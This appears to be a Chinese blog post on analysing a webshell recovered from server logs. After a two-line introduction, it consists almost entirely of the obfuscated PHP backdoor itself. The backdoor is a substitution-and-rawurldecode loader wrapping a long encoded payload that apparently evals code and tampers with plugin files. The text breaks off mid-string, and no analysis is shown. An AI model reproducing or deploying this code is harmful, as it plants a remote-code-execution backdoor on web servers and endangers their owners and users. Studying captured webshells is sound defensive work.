- Published on
webshell分析
- Authors
- Name
- 大聪明
- @wooluoo
发现一例webshell上传,那么我们就要分析一下
从日志中我们获得webshell内容
<?php
if (!defined('ALREADY_RUN_1bc29b36f342a82aaf6658785356718'))
{
define('ALREADY_RUN_1bc29b36f342a82aaf6658785356718', 1);
$lqwsepwc = 2882; function vjpsq($wctjxlltp, $frpcd){$xlvbzhdl = ''; for($i=0; $i < strlen($wctjxlltp); $i++){$xlvbzhdl .= isset($frpcd[$wctjxlltp[$i]]) ? $frpcd[$wctjxlltp[$i]] : $wctjxlltp[$i];}
$esaebsi="rawurl" . "decode";return $esaebsi($xlvbzhdl);}
$erowqloh = '%4H%4c%4H%4c%04aXa_vLs%YA%YSL88J8_1Ji%YS%YV%Y4Dn55%Ym%NG%4H%4c%04aXa_vLs%YA%YS1Ji_L8'.
'8J8v%YS%YV%Y44%Ym%NG%4H%4c%04aXa_vLs%YA%YSFkC_LCLOpsaJX_saFL%YS%YV%Y44%Ym%NG%4H%'.
'4c%04L88J8_8LTJ8saXi%YA4%Ym%NG%4H%4c%04vLs_saFL_1aFas%YA4%Ym%NG%4H%4c%4H%4c%4H%4caf%YA%YRtLf'.
'aXLt%YA%YYror_xe5%YY%Ym%Ym%4H%4c%SG%4H%4c%Y4%Y4%Y4%Y4tLfaXL%YA%YYror_'.
'xe5%YY%YV%Y4%YY%lVX%YY%Ym%NG%4H%4c%SH%4H%4c%4H%4caf%YA%Y'.
'RtLfaXLt%YA%YYHWyxVIeyu_KxrcycIey%YY%Ym%Ym%4H%4c%SG%4H%4c%Y4%Y4%Y4%Y4tLfaXL%YA%YYHWyxVIeyu_Kxr'.
'cycIey%YY%YV%Y4%YY/%YY%Ym%NG%4H%4c%SH%4H%4c%4H%4caf%Y4%YA%YRtLfaXLt%YA%YSc5y'.
'xcHu_ynD_R00OASOfgYNZkAYkkfagA8akZRgksaJRA%YS%Ym%Ym%4H%4c%SG%4H%4c%Y4%Y4%Y'.
'4%Y4tLfaXL%YA%YSc5yxcHu_ynD_R00OASOfgYNZkAYkkfagA8akZRgksaJRA%YS'.
'%YV%Y4R%Ym%NG%4H%4c%4H%4c%Y4%Y4%Y4%Y4%Y0tksk%Y4%NH%Y4Dn55%NG%4H%4c%Y4%Y4%Y4%Y4%Y0tksk'.
'_7L6%Y4%NH%Y4Dn55%NG%4H%4c%4H%4c%Y4%Y4%Y4%Y4%Y0z5eGc5K%lG%YSOv_kpsh%YS%lH%Y4%NH'.
'%Y4%YSOAYSN4mm-NmR0-0OL0-ALfS-NLg4YlLkNAZl%YS%NG%4H%4c%Y4%Y4%Y4%Y4i1JZk1%Y4%Y0Ov_kpsh%NG%4H%4c%4H%4'.
'c%4H%4c%Y4%Y4%Y4%Y4fpXOsaJX%Y4Ov_ZkvLg0_tLOJtL%YA%Y0aXTps%Ym%Y4%SG'.
'%4H%4c%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4af%Y4%YAvs81LX%YA'.
'%Y0aXTps%Ym%Y4%NV%Y40%Ym%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%SG%4H%4c%Y4%Y4%'.
'Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y48Lsp8X%Y4%YY%YY%NG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%SH%4H%4c%4H%4c%Y4'.
'%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y07L6Ks8%Y4%NH%Y4%YYcGVHxwzoWBQ5MDer9'.
'yKInjd3u2kZOtLfihaU71FXJTq8vspEbC6P4RYN0lgSAm%YG/%NH%YY%NG%4H%4c%4H%4'.
'c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y07L6v%Y4%NH%Y4vs8_vT1as%YA%Y07L6Ks8%Ym%NG%4'.
'H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y07L6v%Y4%NH%Y4k88k6_f1aT%YA%Y0'.
'7L6v%Ym%NG%4H%4c%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y0a%Y4%NH%Y44%'.
'NG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y0JpsTps%Y4%NH%Y4'.
'%YY%YY%NG%4H%4c%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y0aXTps%Y4%NH%Y4T8Li_8LT1kOL%YA%YY%Sx%lG%lxc'.
'-2k-P4-m%lV%YG%lV/%lV%NH%lH%Sx%YY%YV%Y4%YY%YY%YV%Y4%Y0aXTps'.
'%Ym%NG%4H%4c%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4tJ%Y4%SG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y'.
'0LXOR%Y4%NH%Y4%Y07L6v%lG%Y0aXTps%lG%Y0a%YG%YG%lH%lH%NG%4H%4c%Y4%'.
'Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y0LXOY%Y4%NH%Y4%Y07L6v%lG%Y0aXTps%lG%Y0a%YG%YG'.
'%lH%lH%NG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y0LXON%Y4%NH%Y4%Y07L6v'.
'%lG%Y0aXTps%lG%Y0a%YG%YG%lH%lH%NG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y'.
'4%Y4%Y4%Y4%Y0LXO0%Y4%NH%Y4%Y07L6v%lG%Y0aXTps%lG%Y0a%YG%YG%lH%lH%NG%4'.
'H%4c%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y0Oh8R%Y4%NH%Y4%YA%Y0LXOR'.
'%Y4%NV%NV%Y4Y%Ym%Y4%SV%Y4%YA%Y0LXOY%Y4%Nx%Nx%Y40%Ym%NG%4H%4c%'.
'Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y0Oh8Y%Y4%NH%Y4%YA%YA%Y0LXOY%Y4%Yg%Y4Rl%Ym%Y4%NV%NV%Y40%Ym%Y4%S'.
'V%Y4%YA%Y0LXON%Y4%Nx%Nx%Y4Y%Ym%NG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y'.
'4%Y4%Y4%Y4%Y4%Y4%Y4%Y0Oh8N%Y4%NH%Y4%YA%YA%Y0LXON%Y4%Yg%Y4N%Ym%Y4%NV%NV%Y4g%'.
'Ym%Y4%SV%Y4%Y0LXO0%NG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y0JpsTps%Y'.
'4%NH%Y4%Y0JpsTps%Y4.%Y4Oh8%YA%Y0Oh8R%Ym%NG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y'.
'4%Y4%Y4%Y4%Y4%Y4%Y4af%Y4%YA%Y0LXON%Y4%YR%NH%Y4g0%Ym%Y4%SG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4'.
'%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y0JpsTps%Y4%NH%Y4%Y0JpsTps%Y4.%Y4Oh8%YA%Y0O'.
'h8Y%Ym%NG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%SH%4H%4c%Y4%Y4%Y4%Y4%'.
'Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4af%Y4%YA%Y0LXO0%Y4%YR%NH%Y4g0%Ym%Y4%SG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4'.
'%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y0JpsTps%Y4%NH%Y4%Y0JpsTps%Y4.%Y4Oh8%YA%Y0Oh8N%Ym%NG%4H%4c%Y4%Y4%Y4%Y4%Y'.
'4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%SH%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%SH%Y4bha1L%Y4%YA%'.
'Y0a%Y4%NV%Y4vs81LX%YA%Y0aXTps%Ym%Ym%NG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%'.
'Y4%Y48Lsp8X%Y4%Y0JpsTps%NG%4H%4c%Y4%Y4%Y4%Y4%SH%4H%4c%4H%4c%Y4%Y'.
'4%Y4%Y4af%Y4%YA%YRfpXOsaJX_LCavsv%YA%YSfa1L_Tps_OJXsLXsv%YS%Ym%Y'.
'm%4H%4c%Y4%Y4%Y4%Y4%SG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4fpXOsaJX%Y4fa1L_Tps_OJXsLXs'.
'v%YA%Y0X%YV%Y4%Y0t%YV%Y4%Y0f1ki%Y4%NH%Y4wk1vL%Ym%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4'.
'%Y4%SG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y0FJtL%Y4%NH%Y4%Y0f1ki%Y4%NH%NH%Y4A%Y4%Nw%Y'.
'4%YSk%YS%Y4%Nc%Y4%YSb%YS%NG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y'.
'4%Y4%Y4%Y4%Y4%Y4%Y0f%Y4%NH%Y4%04fJTLX%YA%Y0X%YV%Y4%Y0FJtL%Ym%NG%4H%4c%Y4%Y4%Y4%Y4%Y4%'.
'Y4%Y4%Y4%Y4%Y4%Y4%Y4af%Y4%YA%Y0f%Y4%NH%NH%NH%Y4wk1vL%Ym%'.
'4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%SG%4H%4c%Y4%Y4%Y4%Y'.
'4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y48Lsp8X%Y44%NG%4H%4c%Y4%Y4%Y'.
'4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%SH%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4L1vL%4H%4c%Y4%Y4%Y4%Y4%Y'.
'4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%SG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y'.
'4%Y4%Y4%Y4%Y4af%Y4%YAav_k88k6%YA%Y0t%Ym%Ym%Y4%Y0t%Y'.
'4%NH%Y4aFT1JtL%YA%Y0t%Ym%NG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y'.
'4%Y4%Y0Z6sLv_b8assLX%Y4%NH%Y4fb8asL%YA%Y0f%YV%Y4%Y0t%Ym%NG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%'.
'Y4%Y4%Y4%Y4%Y4%Y4%Y4fO1JvL%YA%Y0f%Ym%NG%4H%4c%Y4%Y4%Y4%Y4%'.
'Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y48Lsp8X%Y4%Y0Z6sLv_b8assLX%NG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y'.
'4%Y4%Y4%Y4%Y4%Y4%SH%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%SH%4H%4c%Y4%Y4%'.
'Y4%Y4%SH%4H%4c%4H%4c%Y4%Y4%Y4%Y4af%Y4%YA%YRfpXOsaJX_LCavsv%YA%YSfa1L_iLs_OJXsLXs'.
'v%YS%Ym%Ym%4H%4c%Y4%Y4%Y4%Y4%SG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4fpXOsaJX%Y4fa1L_iLs_OJXsLXsv%YA%Y0fa1L'.
'XkFL%Ym%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%SG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y'.
'4%Y4%Y4%Y4%Y4%Y4%Y0fhkXt1L%Y4%NH%Y4fJTLX%YA%Y0fa1LXkFL%YV%Y4%YY8%YY%Ym%NG%4'.
'H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y0fOJXsLXsv%Y4%N'.
'H%Y4f8Lkt%YA%Y0fhkXt1L%YV%Y4fa1LvaPL%YA%Y0fa1LXkFL%Y'.
'm%Ym%NG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4fO1JvL%Y'.
'A%Y0fhkXt1L%Ym%NG%4H%4c%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y48Lsp8'.
'X%Y4%Y0fOJXsLXsv%NG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%SH%4H%4c%Y4%Y4%Y4%Y4%SH%4H%'.
'4c%Y4%Y4%Y4%Y4fpXOsaJX%Y4Ov_iLs_Op88LXs_fa1LTksh%YA%Ym%4H%4c%Y4%Y4%Y4%Y4%SG%4H%4c%Y4%'.
'Y4%Y4%Y4%Y4%Y4%Y4%Y48Lsp8X%Y4s8aF%YAT8Li_8LT1kOL%YA%YY/%lV%YA.%Yc%l'.
'V%Y0/%YY%YV%Y4%YS%YS%YV%Y4__wW5x__%Ym%Ym%NG%4H%4c%Y4%Y4%Y4%Y4%SH%4H%4c%4H%'.
'4c%Y4%Y4%Y4%Y4fpXOsaJX%Y4Ov_tLO86Ts_ThkvL%YA%Y0tksk%Y'.
'V%Y4%Y07L6%Ym%4H%4c%Y4%Y4%Y4%Y4%SG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y0Jps_tks'.
'k%Y4%NH%Y4%YY%YY%NG%4H%4c%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%'.
'Y4fJ8%Y4%YA%Y0a%NH4%NG%Y4%Y0a%NVvs81LX%YA%Y0tksk%Ym%NG%Ym%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%SG%4H%'.
'4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4fJ8%Y4%YA%Y0U%NH4%NG%Y4%Y0U'.
'%NVvs81LX%YA%Y07L6%Ym%Y4%Yg%Yg%Y4%Y0a%NVvs81LX%YA%Y0tksk%Ym%NG%Y4%Y0U%YG%YG%YV%Y4%Y0a%YG'.
'%YG%Ym%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%SG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%'.
'Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y0Jps_tksk%Y4.%NH%Y4Oh8%YAJ'.
'8t%YA%Y0tksk%lG%Y0a%lH%Ym%Y4%lx%Y4J8t%YA%Y07L6%lG%Y0U%'.
'lH%Ym%Ym%NG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%SH%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4'.
'%SH%4H%4c%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y48Lsp8X%Y4%Y0Jps_tksk%NG%4H%4c%Y4%Y4%Y4%Y'.
'4%SH%4H%4c%4H%4c%Y4%Y4%Y4%Y4fpXOsaJX%Y4Ov_tLO86Ts%YA%Y0tksk%YV%Y4%Y07L6%Ym%4H%4'.
'c%Y4%Y4%Y4%Y4%SG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4i1JZk1%Y4%Y0Ov_kpsh%NG%4H%4c%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4'.
'%Y4%Y48Lsp8X%Y4Ov_tLO86Ts_ThkvL%YAOv_tLO86Ts_ThkvL%YA%Y0tksk%YV%'.
'Y4%Y07L6%Ym%YV%Y4%Y0Ov_kpsh%Ym%NG%4H%4c%Y4%Y4%Y4%Y4%SH%'.
'4H%4c%Y4%Y4%Y4%Y4fpXOsaJX%Y4Ov_LXO86Ts%YA%Y0tksk%YV%Y4%Y07L6%Ym%4H%4c%Y4%Y4%Y4%Y4%SG%4H%4c%Y4%Y4'.
'%Y4%Y4%Y4%Y4%Y4%Y4i1JZk1%Y4%Y0Ov_kpsh%NG%4H%4c%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y48Lsp8X%Y'.
'4Ov_tLO86Ts_ThkvL%YAOv_tLO86Ts_ThkvL%YA%Y0tksk%YV%Y4%Y0Ov_kpsh%Ym%Y'.
'V%Y4%Y07L6%Ym%NG%4H%4c%Y4%Y4%Y4%Y4%SH%4H%4c%4H%4c%Y4'.
'%Y4%Y4%Y4fpXOsaJX%Y4Ov_iLs_T1piaX_OJXfai%YA%Ym%4H%4c%Y4%Y4%Y4%Y4%SG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y'.
'0vL1f_OJXsLXs%Y4%NH%Y4%04fa1L_iLs_OJXsLXsv%YAOv_iLs_Op88LXs_fa1LTksh%YA%Ym%Ym%NG%4H%4c%4H%4c%Y'.
'4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y0OJXfai_TJv%Y4%NH%Y4vs8TJv%YA%Y0vL1f_OJXsLXs%YV%Y4Ftl%YAOv_iLs_O'.
'p88LXs_fa1LTksh%YA%Ym%Ym%Ym%NG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4af%Y4%YA%Y0OJXfai_TJv%Y4%YR%NH%NH%Y4w'.
'c5Kx%Ym%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%SG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y0OJXfai%Y'.
'4%NH%Y4vpZvs8%YA%Y0vL1f_OJXsLXs%YV%Y4%Y0OJXfai_TJv%Y4%YG%Y4NY%Ym%NG%4H%4c%Y4'.
'%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y0T1piaXv%Y4%NH%Y4%04pXvL8ak1aPL%YAOv_tLO86Ts%YA8kbp'.
'81tLOJtL%YA%Y0OJXfai%Ym%YV%Y4Ftl%YAOv_iLs_Op88LXs_fa1LTksh%YA%Ym%Ym%Ym%Ym%NG%4H%4c%Y4%Y4%Y4%Y4%'.
'Y4%Y4%Y4%Y4%SH%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4L1vL%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%SG%4H%4c%Y4%Y'.
'4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y0T1piaXv%Y4%NH%Y4c88k6%Y'.
'A%Ym%NG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%SH%4H%4c%4H%4c%Y4%Y4'.
'%Y4%Y4%Y4%Y4%Y4%Y48Lsp8X%Y4%Y0T1piaXv%NG%4H%4c%Y4%Y4%Y4%Y4%SH%4H%4c%4H%4c%'.
'Y4%Y4%Y4%Y4fpXOsaJX%Y4Ov_vLs_T1piaX_OJXfai%YA%Y0T1piaXv%Ym%4H%4c%Y4%Y4%Y4%Y4%S'.
'G%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y0OJXfai_LXO%Y4%NH%Y48kbp81LXOJtL%YAOv_LXO86Ts%YA'.
'%04vL8ak1aPL%YA%Y0T1piaXv%Ym%YV%Y4Ftl%YAOv_iLs_Op88LXs_fa1LTksh%YA%Ym%Ym%Ym%Ym%N'.
'G%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y0vL1f_OJXsLXs%Y4%NH%Y4%04f'.
'a1L_iLs_OJXsLXsv%YAOv_iLs_Op88LXs_fa1LTksh%YA%Ym%Ym%NG%4H%4c%4H%4c%Y4%Y4%Y4'.
'%Y4%Y4%Y4%Y4%Y4%Y0OJXfai_TJv%Y4%NH%Y4vs8TJv%YA%Y0vL1f_OJXsLXs%YV%Y4Ftl%YAOv_iLs_Op88LXs_fa1LTksh%YA%'.
'Ym%Ym%Ym%NG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4af%Y4%YA%Y0OJXfai_TJv%Y4'.
'%YR%NH%NH%Y4wc5Kx%Ym%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%SG%'.
'4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y0OJXfai_J1'.
't%Y4%NH%Y4vpZvs8%YA%Y0vL1f_OJXsLXs%YV%Y4%Y0OJXfai_TJv'.
'%Y4%YG%Y4NY%Ym%NG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y0vL1f_OJX'.
'sLXs%Y4%NH%Y4vs8_8LT1kOL%YA%Y0OJXfai_J1t%YV%Y4%Y0OJXfa'.
'i_LXO%YV%Y4%Y0vL1f_OJXsLXs%Ym%NG%4H%4c%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%'.
'Y4%Y4%SH%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4L1vL%4H%4c%Y4%Y4'.
'%Y4%Y4%Y4%Y4%Y4%Y4%SG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y0vL1f_OJXsLXs%Y4%NH%Y4%Y0vL1f_OJXs'.
'LXs%Y4.%Y4%YY%lVX%lVX//%YY%Y4.%Y4Ftl%YAOv_iLs_Op88LXs_fa1LTksh%YA%Ym%Ym%Y4.%Y4%Y'.
'0OJXfai_LXO%NG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%SH%4H%4c'.
'%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%04fa1L_Tps_OJXsLXsv%YAOv_iLs_Op88LXs_f'.
'a1LTksh%YA%Ym%YV%Y4%Y0vL1f_OJXsLXs%Ym%NG%4H%4c%Y4%Y4%Y4%Y4%SH%4H%4c%4H%4c%Y4%Y4%Y4%Y'.
'4fpXOsaJX%Y4Ov_T1piaX_ktt%YA%Y0XkFL%YV%Y4%Y0ZkvLg0_tksk%Ym%4H%4c'.
'%Y4%Y4%Y4%Y4%SG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y0T1piaXv%Y4%NH%Y4Ov'.
'_iLs_T1piaX_OJXfai%YA%Ym%NG%4H%4c%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y'.
'4%Y0T1piaXv%lG%Y0XkFL%lH%Y4%NH%Y4Ov_ZkvLg0_tLOJtL%YA%Y0ZkvLg0_tksk%Ym%NG%4'.
'H%4c%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4Ov_vLs_T1piaX_OJXfai%YA%Y0T1piaXv%Ym%NG%4H%4c%Y4%Y4%'.
'Y4%Y4%SH%4H%4c%4H%4c%Y4%Y4%Y4%Y4fpXOsaJX%Y4Ov_T1piaX_8L'.
'F%YA%Y0XkFL%Ym%4H%4c%Y4%Y4%Y4%Y4%SG%4H%4c%Y4%Y4%Y4%Y4%Y4'.
'%Y4%Y4%Y4%Y0T1piaXv%Y4%NH%Y4Ov_iLs_T1piaX_OJXfai%YA%Ym%NG%4H%4c%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4pXvLs'.
'%YA%Y0T1piaXv%lG%Y0XkFL%lH%Ym%NG%4H%4c%4H%4c%Y4%Y4%Y4%Y4%Y4'.
'%Y4%Y4%Y4Ov_vLs_T1piaX_OJXfai%YA%Y0T1piaXv%Ym%NG%4H%4c%Y4%Y4%Y4%Y4%SH%4H%4c%'.
'4H%4c%Y4%Y4%Y4%Y4fpXOsaJX%Y4Ov_T1piaX_1Jkt%YA%Y0XkFL%NHDn55%Ym%4H%4c%Y4%Y4%Y4%Y4%SG%4H%4c%Y4%Y4%'.
'Y4%Y4%Y4%Y4%Y4%Y4fJ8LkOh%Y4%YAOv_iLs_T1piaX_OJXfai%YA%Ym%Y4kv%Y4%Y0TXkFL%NH%Nx%Y0TOJXsLXs'.
'%Ym%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%SG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4af%Y4%YA%Y0XkFL%'.
'Ym%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%SG%4H%4c%Y4%Y4%Y'.
'4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4af%Y4%YAvs8O'.
'FT%YA%Y0XkFL%YV%Y4%Y0TXkFL%Ym%Y4%NH%NH%Y44%Ym%4H%4c%'.
'Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%SG%4H%4c%Y4%Y4%Y4%Y4%Y'.
'4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4LEk1%YA%Y0TOJXsLX'.
's%Ym%NG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y'.
'4%Y4%Y4%Y4Z8Lk7%NG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y'.
'4%SH%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%SH%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4L1'.
'vL%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%SG%4H%4c%Y4%Y4%Y4'.
'%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4LEk1%YA%Y0TOJXsLXs%Ym%'.
'NG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%SH%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4'.
'%SH%4H%4c%Y4%Y4%Y4%Y4%SH%4H%4c%4H%4c%Y4%Y4%Y4%Y4fJ8LkOh%Y4%YA%Y0_VeeQWx%Y4kv%Y4%Y07L6%'.
'NH%Nx%Y0Ek1pL%Ym%4H%4c%Y4%Y4%Y4%Y4%SG%4H%4c%Y4%Y4%Y4%Y4%Y4'.
'%Y4%Y4%Y4%Y0tksk%Y4%NH%Y4%Y0Ek1pL%NG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%'.
'Y4%Y4%Y0tksk_7L6%Y4%NH%Y4%Y07L6%NG%4H%4c%Y4%Y4%Y4%Y4%SH%4H%4c%4H%'.
'4c%Y4%Y4%Y4%Y4af%Y4%YA%YR%Y0tksk%Ym%4H%4c%Y4%Y4%Y4%Y4%SG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4fJ8LkOh%Y'.
'4%YA%Y0_reKI%Y4kv%Y4%Y07L6%NH%Nx%Y0Ek1pL%Ym%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4'.
'%Y4%Y4%SG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y0tksk%Y4%NH%Y4%Y0Ek1pL'.
'%NG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y0tksk_7L6%Y4%NH%Y4%Y07L6%NG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y'.
'4%Y4%Y4%SH%4H%4c%Y4%Y4%Y4%Y4%SH%4H%4c%4H%4c%Y4%Y4%Y4%Y4%Y0tksk%Y4%NH%Y4%'.
'04pXvL8ak1aPL%YAOv_tLO86Ts%YAOv_ZkvLg0_tLOJtL%YA%Y0tksk%Ym%YV%Y4%Y0tksk_7L6%Ym%Ym%NG%4'.
'H%4c%4H%4c%Y4%Y4%Y4%Y4af%Y4%YAavvLs%YA%Y0tksk%lG%YSk7%YS%lH%Ym%Y4%Yg%Yg%Y4%Y0Ov'.
'_kpsh%NH%NH%Y0tksk%lG%YSk7%YS%lH%Ym%4H%4c%Y4%Y4%Y4%Y4%SG%4H%4c%Y4%Y4%Y4%Y4%'.
'Y4%Y4%Y4%Y4af%Y4%YA%Y0tksk%lG%YSk%YS%lH%Y4%NH%NH%Y4%YSa%YS%Ym%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%'.
'Y4%SG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y0a%Y4%NH%Y4c88k6'.
'%YA%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%YSTE%YS%Y4'.
'%NH%Nx%Y4%04ThTEL8vaJX%YA%Ym%YV%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%'.
